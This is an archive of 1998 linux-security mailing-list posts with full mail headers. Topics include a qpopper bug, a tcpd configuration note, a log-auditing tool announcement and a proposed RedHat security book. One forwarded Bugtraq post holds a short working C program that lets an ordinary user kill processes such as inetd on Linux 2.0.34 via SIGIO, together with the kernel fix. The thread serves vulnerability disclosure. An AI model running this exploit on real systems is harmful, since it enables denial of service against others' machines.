(Who is just glad that RedHat continues to keep RedHat 4.2 current with
security, even though it is an older distribution. In fact, their
support is the best support I have seen for a legacy distro)
"That which does not destroy me, makes me stronger" -- Nietzsche
From mail@mail.redhat.com Sun Jul 5 10:03:49 1998
Received: (qmail 17977 invoked from network); 5 Jul 1998 08:08:17 -0000
Received: from 3dyn101.delft.casema.net (HELO rosie.BitWizard.nl)
(root@195.96.104.101)
by mail2.redhat.com with SMTP; 5 Jul 1998 08:08:17 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id KAA03100
for <linux-security@redhat.com>; Sun, 5 Jul 1998 10:03:49 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id KAA01052
for linux-security@redhat.com; Sun, 5 Jul 1998 10:08:27 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Wed Jul 1 08:03:15 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id IAA01216
for <wolff@dutepp0.et.tudelft.nl>; Wed, 1 Jul 1998 08:04:42 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id HAA18000 for
<r.e.wolff@BitWizard.nl>; Wed, 1 Jul 1998 07:53:29 +0200
Received: (qmail 31343 invoked by uid 501); 1 Jul 1998 06:04:37 -0000
Received: (qmail 9933 invoked from network); 1 Jul 1998 05:35:24 -0000
Received: from duzzit.interhdl.com (205.179.46.25)
by mail2.redhat.com with SMTP; 1 Jul 1998 05:35:24 -0000
Received: (qmail 20024 invoked by uid 500); 1 Jul 1998 05:35:23 -0000
Date: Tue, 30 Jun 1998 22:35:22 -0700 (PDT)
From: Ira Abramov <ira@scso.com>
X-Sender: ira@izzy.interhdl.com
cc: linux-security@redhat.com
Subject: [linux-security] Re: Patched Qpopper2.5 release Notification. (fwd)
In-Reply-To: <Pine.LNX.3.96.980630173830.3172B-100000@jp-gp.vsi.nl>
Message-ID: <Pine.LNX.3.95.980630223342.19866A-100000@izzy.interhdl.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
Status: RO
On Tue, 30 Jun 1998, Jan-Philip Velders wrote:
> well, swift response!
> Qualcomm has a patched qpopper (2.5)
read bugtraq again, it already sprung a leak :-(
From mail@mail.redhat.com Sun Jul 5 10:05:24 1998
Received: (qmail 19561 invoked from network); 5 Jul 1998 08:09:51 -0000
Received: from 3dyn101.delft.casema.net (HELO rosie.BitWizard.nl)
(root@195.96.104.101)
by mail2.redhat.com with SMTP; 5 Jul 1998 08:09:51 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id KAA03106
for <linux-security@redhat.com>; Sun, 5 Jul 1998 10:05:24 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id KAA01085
for linux-security@redhat.com; Sun, 5 Jul 1998 10:10:01 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Thu Jul 2 12:13:53 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id MAA19631
for <wolff@dutepp0.et.tudelft.nl>; Thu, 2 Jul 1998 12:15:23 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id MAA19071 for
<r.e.wolff@BitWizard.nl>; Thu, 2 Jul 1998 12:04:09 +0200
Received: (qmail 20580 invoked by uid 501); 2 Jul 1998 10:15:16 -0000
Received: (qmail 19265 invoked from network); 2 Jul 1998 10:13:46 -0000
Received: from ns1.bangla.net (root@203.188.252.2)
by mail2.redhat.com with SMTP; 2 Jul 1998 10:13:46 -0000
Received: from warp.basc-bd.org (root@[203.188.253.61]) by ns1.bangla.net
(8.7.5/8.7.3) with ESMTP id QAA24520 for <linux-security@redhat.com>; Thu,
2 Jul 1998 16:24:23 +0600 (GMT+0600)
Received: from thing.annexgrp.org (tunl.annexgrp.org [203.188.254.166])
by warp.basc-bd.org (8.8.7/8.8.7) with ESMTP id QAA03479
for <linux-security@redhat.com>; Thu, 2 Jul 1998 16:10:12 +0600
Received: from localhost (annex@localhost)
by thing.annexgrp.org (8.9.0/8.9.0) with SMTP id LAA07398
for <linux-security@redhat.com>; Thu, 2 Jul 1998 11:03:33 +0600
Date: Thu, 2 Jul 1998 11:03:32 +0600 (BGT)
From: Annex <annex@thing.annexgrp.org>
To: linux-security@redhat.com
Subject: Serious Linux 2.0.34 security problem (fwd)
Message-ID: <Pine.BOO.3.96.980702110321.7217E-100000@thing.annexgrp.org>
Organization: Annex Group (Bangladesh)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
Status: RO
---------- Forwarded message ----------
Date: Tue, 30 Jun 1998 15:10:47 +0800
From: David Luyer <luyer@UCS.UWA.EDU.AU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Serious Linux 2.0.34 security problem
I just saw this mentioned on linux-kernel and confirmed it;
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
int s, p;
if(argc != 2) {
fputs("Please specify a pid to send signal to.\n", stderr);
exit(0);
} else {
p = atoi(argv[1]);
}
fcntl(0,F_SETOWN,p);
s = fcntl(0,F_GETFL,0);
fcntl(0,F_SETFL,s|O_ASYNC);
printf("Sending SIGIO - press enter.\n");
getchar();
fcntl(0,F_SETFL,s&~O_ASYNC);
printf("SIGIO send attempted.\n");
return 0;
}
This can kill from a normal user account the inetd process under Linux
2.0.34 by sending a SIGIO. Very bad.
The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
is approximately 139.
David.
From mail@mail.redhat.com Sun Jul 5 10:06:02 1998
Received: (qmail 20330 invoked from network); 5 Jul 1998 08:10:30 -0000
Received: from 3dyn101.delft.casema.net (HELO rosie.BitWizard.nl)
(root@195.96.104.101)
by mail2.redhat.com with SMTP; 5 Jul 1998 08:10:30 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id KAA03114
for <linux-security@redhat.com>; Sun, 5 Jul 1998 10:06:02 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id KAA01100
for linux-security@redhat.com; Sun, 5 Jul 1998 10:10:40 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Sat Jul 4 13:39:19 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id NAA05627
for <wolff@dutepp0.et.tudelft.nl>; Fri, 3 Jul 1998 13:37:44 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id NAA19871 for
<r.e.wolff@BitWizard.nl>; Fri, 3 Jul 1998 13:26:29 +0200
Received: (qmail 16581 invoked by uid 501); 3 Jul 1998 11:37:39 -0000
Received: (qmail 16565 invoked from network); 3 Jul 1998 11:37:36 -0000
Received: from mail.citechco.net (203.127.137.3)
by mail2.redhat.com with SMTP; 3 Jul 1998 11:37:36 -0000
Received: from thing.annexgrp.org (ls1-13-154.citechco.net [203.127.137.154]) by
mail.citechco.net (8.7.5/8.7.3) with ESMTP id RAA14597; Fri, 3 Jul 1998 17:35:22
+0600 (GMT+0600)
Received: from localhost (annex@localhost)
by thing.annexgrp.org (8.9.0/8.9.0) with SMTP id RAA11873;
Fri, 3 Jul 1998 17:37:16 +0600
Date: Fri, 3 Jul 1998 17:37:12 +0600 (BGT)
From: Annex <annex@thing.annexgrp.org>
To: Wietse Venema <wietse@porcupine.org>
cc: linux-security@redhat.com
Subject: [linux-security] Re: tcpd anomaly
In-Reply-To: <19980702115529.45875E0CF0@spike.porcupine.org>
Message-ID: <Pine.BOO.3.96.980703173541.11852A-100000@thing.annexgrp.org>
Organization: Annex Group (Bangladesh)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
On Thu, 2 Jul 1998, Wietse Venema wrote:
| P.S. Appending "&" to a "twist" command will screw it
up: the shell
| will close the standard input of the twisted command, so it can't
| read from the network.
just wanted to add: I wasn't using TWIST when I had "&" at the
end. what I
had was:
smbd: ALL: (/bin/echo "%u at %n (%a) to %d" | \
/bin/mail me) &
in /etc/hosts.deny
don't flame me, I don't use it anymore.
---
Annex
From mail@mail.redhat.com Sun Jul 5 22:51:24 1998
Received: (qmail 5612 invoked from network); 5 Jul 1998 20:55:56 -0000
Received: from 3dyn144.delft.casema.net (HELO rosie.BitWizard.nl)
(root@195.96.104.144)
by mail2.redhat.com with SMTP; 5 Jul 1998 20:55:56 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id WAA04352
for <linux-security@redhat.com>; Sun, 5 Jul 1998 22:51:24 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id WAA04386
for linux-security@redhat.com; Sun, 5 Jul 1998 22:55:58 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Sun Jul 5 12:26:18 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id MAA24446
for <wolff@dutepp0.et.tudelft.nl>; Sun, 5 Jul 1998 12:28:28 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id MAA20907 for
<r.e.wolff@BitWizard.nl>; Sun, 5 Jul 1998 12:17:13 +0200
Received: (qmail 12523 invoked by uid 501); 5 Jul 1998 10:27:59 -0000
Received: (qmail 12511 invoked from network); 5 Jul 1998 10:27:58 -0000
Received: from shodan.in-trier.de (root@198.22.51.3)
by mail2.redhat.com with SMTP; 5 Jul 1998 10:27:58 -0000
Received: from localhost (root@ufp.in-trier.de [198.22.51.119])
by shodan.in-trier.de (8.8.8/8.8.8) with SMTP id MAA09252;
Sun, 5 Jul 1998 12:29:39 +0200
Date: Sun, 5 Jul 1998 12:00:57 +0200 (CEST)
From: Linux mailing list user <linux@windows95.sucks.eu.org>
X-Sender: linux@k6.bero
To: Annex <annex@thing.annexgrp.org>
cc: linux-security@redhat.com
Subject: [linux-security] Re: Serious Linux 2.0.34 security problem (fwd)
In-Reply-To: <Pine.BOO.3.96.980702110321.7217E-100000@thing.annexgrp.org>
Message-ID: <Pine.LNX.3.96.980705114733.220A-100000@k6.bero>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
On Thu, 2 Jul 1998, Annex wrote:
> I just saw this mentioned on linux-kernel and confirmed it;
[...]
> The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
> is approximately 139.
A much simpler fix is to update to a 2.0.35preX kernel (X>=3).
ftp://ftp.uk.linux.org/pub/linux/alan/2.0.35pre/
LLaP
bero
---
Windows 98 supports real multitasking - it can boot and crash simultaneously.
***
Anyone sending unwanted advertising e-mail to this address will be charged
$25 for network traffic and computing time. By extracting my address from
this message or its header, you agree to these terms.
From mail@mail.redhat.com Mon Jul 6 07:53:42 1998
Received: (qmail 25106 invoked from network); 6 Jul 1998 05:58:09 -0000
Received: from 3dyn147.delft.casema.net (HELO rosie.BitWizard.nl)
(root@195.96.104.147)
by mail2.redhat.com with SMTP; 6 Jul 1998 05:58:09 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id HAA06175
for <linux-security@redhat.com>; Mon, 6 Jul 1998 07:53:42 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id HAA00605
for linux-security@redhat.com; Mon, 6 Jul 1998 07:58:13 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Mon Jul 6 07:41:36 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id FAA01242
for <wolff@dutepp0.et.tudelft.nl>; Mon, 6 Jul 1998 05:45:30 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id FAA21336 for
<r.e.wolff@BitWizard.nl>; Mon, 6 Jul 1998 05:34:14 +0200
Received: (qmail 7607 invoked by uid 501); 6 Jul 1998 03:44:26 -0000
Received: (qmail 7586 invoked from network); 6 Jul 1998 03:44:25 -0000
Received: from tarkin.fdt.net (@209.212.128.45)
by mail2.redhat.com with SMTP; 6 Jul 1998 03:44:25 -0000
Received: from localhost (jlewis@localhost)
by tarkin.fdt.net (8.8.5/8.8.5) with SMTP id XAA13121;
Sun, 5 Jul 1998 23:40:15 -0400
Date: Sun, 5 Jul 1998 23:40:15 -0400 (EDT)
From: Jon Lewis <jlewis@inorganic5.fdt.net>
X-Sender: jlewis@tarkin.fdt.net
Reply-To: Jon Lewis <jlewis@inorganic5.fdt.net>
To: Linux mailing list user <linux@windows95.sucks.eu.org>
cc: Annex <annex@thing.annexgrp.org>, linux-security@redhat.com
Subject: [linux-security] Re: Serious Linux 2.0.34 security problem (fwd)
In-Reply-To: <Pine.LNX.3.96.980705114733.220A-100000@k6.bero>
Message-ID: <Pine.LNX.3.95.980705233216.790c-100000@tarkin.fdt.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
On Sun, 5 Jul 1998, Linux mailing list user wrote:
> > The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line
number
> > is approximately 139.
>
> A much simpler fix is to update to a 2.0.35preX kernel (X>=3).
Actually, this is such a trivial bug to fix, that for many it probably
makes more sense to edit fs/fcntl.c and recompile rather than suject
themselves to the latest pre-release kernel...unless they like testing
pre-releases.
Just out of curiosity...word of this broke in linux-kernel and bugtraq in
the last days of June. Were the linux-security moderators away on
holiday, or do they live in a time zone several days behind the rest of
the world?
[mod: Moderators have other stuff to do besides keeping an eye on
linux-security. I've actually been pretty busy lately: I currently
have three clients shouting that they want stuff done NOW. Anyway, I
still try to find the time to moderate linux-security once a day.
But this doesn't have anything to do with what you mention: I don't go
and find stuff on Linux-kernel and forward it here. I let someone else
do that. So if you see something on another mailing list, and think
its relevant, go ahead and forward it.
Regards,
Roger Wolff
Your Moderator. ]
------------------------------------------------------------------
Jon Lewis <jlewis@fdt.net> | Spammers will be winnuked or
Network Administrator | drawn and quartered...whichever
Florida Digital Turnpike | is more convenient.
______http://inorganic5.fdt.net/~jlewis/pgp for PGP public key____
From mail@mail.redhat.com Wed Jul 8 10:27:34 1998
Received: (qmail 20318 invoked from network); 8 Jul 1998 08:31:48 -0000
Received: from 3dyn81.delft.casema.net (HELO rosie.BitWizard.nl)
(root@195.96.104.81)
by mail2.redhat.com with SMTP; 8 Jul 1998 08:31:48 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id KAA12952
for <linux-security@redhat.com>; Wed, 8 Jul 1998 10:27:34 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id KAA01246
for linux-security@redhat.com; Wed, 8 Jul 1998 10:31:52 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Wed Jul 8 09:27:26 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id IAA14449
for <wolff@dutepp0.et.tudelft.nl>; Wed, 8 Jul 1998 08:31:10 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id IAA23067 for
<r.e.wolff@BitWizard.nl>; Wed, 8 Jul 1998 08:19:52 +0200
Received: (qmail 6509 invoked by uid 501); 8 Jul 1998 06:28:23 -0000
Received: (qmail 6485 invoked from network); 8 Jul 1998 06:28:21 -0000
Received: from seifried-gateway.powersurfr.com (HELO
gateway-seifried.seifried.org) (24.108.11.202)
by mail2.redhat.com with SMTP; 8 Jul 1998 06:28:21 -0000
Received: from localhost (seifried@localhost)
by gateway-seifried.seifried.org (8.8.7/1.0.2) with SMTP id AAA01231
for <linux-security@redhat.com>; Wed, 8 Jul 1998 00:27:40 -0600
Date: Wed, 8 Jul 1998 00:27:40 -0600 (MDT)
From: <seifried@seifried.org>
To: linux-security@redhat.com
Subject: ANNOUNCE: WinAudlog, centralized logfile checking - forward from ,
bugtraq
In-Reply-To: <Pine.LNX.3.96.980705114733.220A-100000@k6.bero>
Message-ID:
<Pine.LNX.3.96.980708002527.1222A-100000@gateway-seifried.seifried.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
>From owner-bugtraq@NETSPACE.ORG Tue Jul 7 16:23:51 1998
-----BEGIN PGP SIGNED MESSAGE-----
DO YOU TRUST YOUR SYSTEM'S LOGS?
AudLog For Windows
Secure System Log Auditing
** FREE **
AUDLOG for Windows can be used to centralize the auditing of
distributed system logs in a network and certify that intruders did not
modify these logs.
When combined with SECURE SYSLOG, AudLog for Windows makes the
perfect package for SECURE LOGGING and AUDITING:
+ Easy to use graphical interface
+ AUDLOG downloads the logs generated by SECURE SYSLOG and
verifies its integrity
+ Allows for centralized auditing of an unlimited number of
computers in a network
+ PEO-1 cryptographic protocol for authenticate log-files
integrity
+ 128-bits symmetric cryptography and a challenge-response
protocol for mutual authentication and confidentiality.
+ Iconized Security flags for log-files, hosts and groups of
hosts.
SECURE SYSLOG (ssyslog) is available for UNIX systems. Designed to
replace the syslog daemon, ssyslog implements a cryptographic protocol called
PEO-1 that allows the remote auditing of system logs. Auditing remains possible
even if an intruder gains superuser privileges in the system, the protocol
guarantees that the information logged before and during the intrusion process
cannot be modified without the auditor (on a remote, trusted host) noticing.
What is AudLog for Windows?
~~~~~~~~~~~~~~~~~~~~~~~~~~
Audlog is a Win95/WinNT program that lets you manipulate logfiles from a
centralized point in your network. It works in conjuction with
Secure Syslog, a replacement for the UNIX syslogd that provides
cryptographic mechanisms to verify the integrity of the log files.
Secure Syslog provides a way auditing the log files remotely, from
a trusted auditing host using the provided UNIX utility called
'audlog'.
WinAudlog is the equivalent program for MS Windows, it features an
easy to use interface, the required crypto algorithms for authentication,
data transfer and integrity checking.
AUDLOG was developed in CORELABS, the research labs of CORE SDI S.A.,
and is now being distributed freely.
AUDLOG and SECURE SYSLOG are FREE.
To get the binary for Windows 95/NT go to:
- -------------------------------------------
<http://www.core-sdi.com/audlog>
To get the source code and/or more information regarding ssyslog go to:
- -----------------------------------------------------------------------
<http://www.core-sdi.com/ssyslog>
To get more information about CORELABS, SECURE LOGGING or PEO go to:
- --------------------------------------------------------------------
<http://www.core-sdi.com/ENGLISH/CoreLabs>
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
iQCVAwUBNaKG8vnO/LnPTgz1AQEt1AP+LBAKZlvNcPxBlTkYm3RxGzW/zPFAlHdg
bMlPfgT5gU17C+xuBsfkrNJ/cQ92QDaUmFu7YM1/g3fgg9I8qzHEUv55asxdD86F
JTUzhKSM1E3/iu2ZbksX6kAFwUyG05csw8xCm1sz9Rlauu4wnjmVHvyQ4erZha3Z
CKX+PKfxVOc=Bpl9
-----END PGP SIGNATURE-----
--
==============================[ CORE Seguridad de la Informacion S.A.
]======Ivan Arce
Gerencia de Tecnologia Email : ivan@core-sdi.com
Av. Santa Fe 2861 5to C TE : +54-1-821-1030
CP 1425 FAX : +54-1-821-1030
Buenos Aires, Argentina Mensajeria: +54-1-317-4157
=============================================================================
---end of message
-seifried
From mail@mail.redhat.com Wed Jul 8 10:27:30 1998
Received: (qmail 20319 invoked from network); 8 Jul 1998 08:31:48 -0000
Received: from 3dyn81.delft.casema.net (HELO rosie.BitWizard.nl)
(root@195.96.104.81)
by mail2.redhat.com with SMTP; 8 Jul 1998 08:31:48 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id KAA12950
for <linux-security@redhat.com>; Wed, 8 Jul 1998 10:27:30 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id KAA01231
for linux-security@redhat.com; Wed, 8 Jul 1998 10:31:49 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Wed Jul 8 09:27:33 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id IAA14501
for <wolff@dutepp0.et.tudelft.nl>; Wed, 8 Jul 1998 08:39:40 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id IAA23073 for
<r.e.wolff@BitWizard.nl>; Wed, 8 Jul 1998 08:28:23 +0200
Received: (qmail 11551 invoked by uid 501); 8 Jul 1998 06:34:20 -0000
Received: (qmail 11536 invoked from network); 8 Jul 1998 06:34:19 -0000
Received: from seifried-gateway.powersurfr.com (HELO
gateway-seifried.seifried.org) (24.108.11.202)
by mail2.redhat.com with SMTP; 8 Jul 1998 06:34:19 -0000
Received: from localhost (seifried@localhost)
by gateway-seifried.seifried.org (8.8.7/1.0.2) with SMTP id AAA01235
for <linux-security@redhat.com>; Wed, 8 Jul 1998 00:33:41 -0600
Date: Wed, 8 Jul 1998 00:33:41 -0600 (MDT)
From: <seifried@seifried.org>
To: linux-security@redhat.com
Subject: RedHat 5.X Security Book
In-Reply-To: <Pine.LNX.3.96.980705114733.220A-100000@k6.bero>
Message-ID:
<Pine.LNX.3.96.980708002750.1222B-100000@gateway-seifried.seifried.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
I was looking around for a book specifically on Linux security a week or
two ago, and couldn't find any. I wanted something Linux specific as
opposed to say O'Reilly's yellow safe book. Couldn't find any (not
even at
our local computer book store which has 50+ linux titles). So I looked
through RedHat's site, the manuals that came with 4.1, 5.0, and 5.1
nothing there. How odd I thought. So I started writing one, it is pretty
RedHat specific (as the subject of this email would imply). I would like
to get some feedback before I continue, a.k.a. is it worthwhile/useful?
http://www.seifried.org/redhat-security/
and in case the dns fall down go boom because we're moving them to a
newer, faster network connection (and the internic seems the be
responding somewhat slowly):
http://24.108.11.200/redhat-security/
Please don't flame me over details/etc, if you spot an error tell me and I
will fix it (I have been pretty careful though, it is supposed to be a
book on security =).
-seifried
From mail@mail.redhat.com Thu Jul 9 08:30:04 1998
Received: (qmail 13033 invoked from network); 9 Jul 1998 06:34:07 -0000
Received: from 3dyn81.delft.casema.net (HELO rosie.BitWizard.nl)
(root@195.96.104.81)
by mail2.redhat.com with SMTP; 9 Jul 1998 06:34:07 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id IAA16245
for <linux-security@redhat.com>; Thu, 9 Jul 1998 08:30:04 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id IAA00891
for linux-security@redhat.com; Thu, 9 Jul 1998 08:34:17 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Wed Jul 8 16:45:32 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id QAA21085
for <wolff@dutepp0.et.tudelft.nl>; Wed, 8 Jul 1998 16:48:51 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id QAA23423 for
<r.e.wolff@BitWizard.nl>; Wed, 8 Jul 1998 16:37:33 +0200
Received: (qmail 13149 invoked by uid 501); 8 Jul 1998 14:37:19 -0000
Received: (qmail 13014 invoked from network); 8 Jul 1998 14:37:16 -0000
Received: from pace.picante.com (root@199.103.241.49)
by mail2.redhat.com with SMTP; 8 Jul 1998 14:37:16 -0000
Received: from pace.picante.com (gtaylor@localhost [127.0.0.1])
by pace.picante.com (8.8.7/8.8.7) with ESMTP id KAA17970
for <linux-security@redhat.com>; Wed, 8 Jul 1998 10:40:00 -0400
Message-Id: <199807081440.KAA17970@pace.picante.com>
To: linux-security@redhat.com
Subject: [linux-security] Re: RedHat 5.X Security Book
In-reply-to: Your message of "Wed, 08 Jul 1998 00:33:41 MDT."
<Pine.LNX.3.96.980708002750.1222B-100000@gateway-seifried.seifried.org>
Date: Wed, 08 Jul 1998 10:39:59 -0300
From: Grant Taylor <gtaylor@picante.com>
X-moderate: yes
>>>>> <seifried@seifried.org> writes:
> I was looking around for a book specifically on Linux security a week or
> two ago, and couldn't find any. I wanted something Linux specific as
> opposed to say O'Reilly's yellow safe book.
There are actually Linux-specific details in Practical; I put some of
them there. They are not, however, distribution-specific.
> So I started writing one, it is pretty RedHat specific (as the
> subject of this email would imply). I would like to get some
> feedback before I continue, a.k.a. is it worthwhile/useful?
Well, I'd say that about 80% of what you'll end up with, if you
continue, will be a duplication of information found in Practical.
There's very little to Unix security that is specific to Linux. It's
also not at all clear that a Linux-specific security book would be
beneficial; without a good understanding of what's going on any
security implementation will fail, and the knowledge for such an
understanding is the same be it Linux, FreeBSD, Dec Unix, Solaris,
etc.
OTOH, your section on RPM is most certainly useful, although it's a
bit sketchy right now. And it'll be interesting to try and keep your
table up-to-date as holes are found and new packages are released.
Perhaps you should coordinate the data with one of the various RPM
listing web sites or one of the rpm manager tools.
--
Grant Taylor - gtaylor@picante.com - http://www.picante.com/~gtaylor/
Where do these people come from? Finger for PGP public key.